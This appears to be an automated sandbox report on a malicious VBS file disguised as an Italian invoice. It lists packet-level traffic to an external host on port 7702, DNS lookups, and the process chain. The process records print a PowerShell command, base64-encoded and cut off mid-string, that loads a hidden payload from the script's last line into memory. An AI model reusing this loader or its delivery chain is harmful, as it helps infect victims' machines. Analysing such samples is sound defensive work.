Oct 31, 2024 14:16:34.284356117 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.284385920 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.284399033 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.284406900 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.284472942 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.284485102 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.284579039 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.284640074 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.284704924 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.303459883 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.303507090 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.303510904 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.303518057 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.303555965 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.303566933 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.303575039 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.303643942 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.303683043 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.303694963 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.303705931 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.303880930 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.304368019 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.304415941 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.304425955 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.304429054 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.304467916 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.306963921 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.306987047 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.306999922 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.307086945 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.307113886 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.307219982 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.307230949 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.307238102 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.307286024 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.351846933 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.351864100 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.351893902 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.351983070 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.352314949 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.352494955 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.395947933 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.396049976 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.396065950 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.396078110 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.396173000 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.396173000 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.396327019 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.398888111 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.398945093 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.398962021 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.399005890 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.399025917 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.402918100 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.402931929 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.402944088 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.403059959 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.422089100 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.422116041 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.422127962 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.422178984 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.422178984 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.422250032 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.422261953 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.422350883 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.422396898 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.422424078 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.422435999 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.422496080 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.422727108 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.422925949 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.422938108 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.422949076 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.422959089 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.422979116 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.423015118 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.425307989 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.425381899 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.425436974 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.425676107 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.425687075 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.425743103 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.469850063 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.469862938 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.469875097 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.469983101 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.470488071 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.470545053 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.471019983 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.471030951 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.471111059 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.471117973 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.514554977 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.514591932 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.514605999 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.514663935 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.514699936 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.517504930 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.517528057 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.517539978 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.517575979 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.517582893 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.517643929 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.517673016 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.517714024 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.517776012 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.521516085 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.521600008 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.521611929 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.521668911 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.540754080 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.540782928 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.540801048 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.540827990 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.540872097 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.541008949 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.596154928 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.615108013 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.620728016 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.620821953 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:35.407243013 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:35.412297964 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:35.412378073 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:35.426783085 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:35.426906109 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:35.431969881 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:35.431986094 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:35.431996107 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:35.432005882 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:35.432020903 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:35.432066917 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:35.432074070 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:35.432084084 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:35.432094097 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:35.432111979 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:35.432118893 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:35.432121992 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:35.432152033 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:35.432190895 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:35.437063932 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:35.437122107 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:35.437150002 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:35.437161922 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:35.437171936 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:35.437197924 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:35.437230110 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:35.437310934 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:35.437320948 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:35.437383890 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:35.478749990 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:35.478890896 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:35.526679039 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:35.526848078 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:35.574623108 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:35.574677944 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:35.622704983 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:35.622755051 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:35.670617104 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:35.670665979 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:35.722660065 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:35.722847939 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:35.770723104 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:35.770812988 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:35.822676897 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.030258894 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.443952084 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:36.451297045 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.451411009 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:36.457024097 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.852598906 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:36.852780104 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:36.857534885 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.857633114 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.857696056 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.857706070 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.857717991 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.857728958 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.857759953 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:36.857788086 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:36.857811928 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.857822895 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.857831955 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.857847929 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.857856035 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.857872963 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:36.857884884 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:36.857892036 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.857922077 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:36.857933044 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:36.857994080 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858037949 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858047009 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858057976 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858102083 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:36.858117104 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:36.858187914 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858197927 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858207941 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858217955 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858234882 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858243942 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:36.858244896 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858254910 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858263969 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858269930 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:36.858273983 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858292103 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858300924 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858310938 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858319044 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858329058 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858339071 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858347893 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858356953 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858381987 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858391047 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858400106 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858448982 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858551979 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858671904 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858681917 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858763933 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858947039 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858956099 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858966112 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858974934 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.858985901 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.859003067 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.859010935 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.862730026 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.862755060 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.862763882 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.862775087 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.862786055 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.862859964 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.862869024 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.862879038 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.862911940 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.862920046 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.862938881 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.862947941 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863003969 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863015890 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863040924 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863051891 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863118887 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863128901 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863140106 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863218069 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863226891 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863235950 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863245964 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863256931 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863296032 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863305092 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863365889 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863410950 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863419056 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863429070 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863440990 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863500118 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863508940 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863518953 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863529921 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863538980 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863609076 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:36.863697052 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:37.409511089 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:37.414407969 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:37.414555073 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:37.419399977 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:37.677963972 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:37.815659046 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:37.815735102 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:37.953704119 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:37.957324982 CET	49815	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:37.964373112 CET	7702	49815	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:37.964431047 CET	49815	7702	192.168.2.7	185.36.141.107

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 14:16:18.484611988 CET	59803	53	192.168.2.7	1.1.1.1
Oct 31, 2024 14:16:18.492244005 CET	53	59803	1.1.1.1	192.168.2.7
Oct 31, 2024 14:16:35.085961103 CET	63993	53	192.168.2.7	1.1.1.1
Oct 31, 2024 14:16:35.093359947 CET	53	63993	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 31, 2024 14:16:18.484611988 CET	192.168.2.7	1.1.1.1	0x4a4c	Standard query (0)	90.168.9.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Oct 31, 2024 14:16:35.085961103 CET	192.168.2.7	1.1.1.1	0x95f	Standard query (0)	90.168.9.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 31, 2024 14:16:18.492244005 CET	1.1.1.1	192.168.2.7	0x4a4c	Name error (3)	90.168.9.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Oct 31, 2024 14:16:35.093359947 CET	1.1.1.1	192.168.2.7	0x95f	Name error (3)	90.168.9.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

Target ID:	2
Start time:	09:16:03
Start date:	31/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs"
Imagebase:	0x7ff783f40000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:16:04
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" /Y
Imagebase:	0x7ff6692d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:16:04
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:16:06
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgB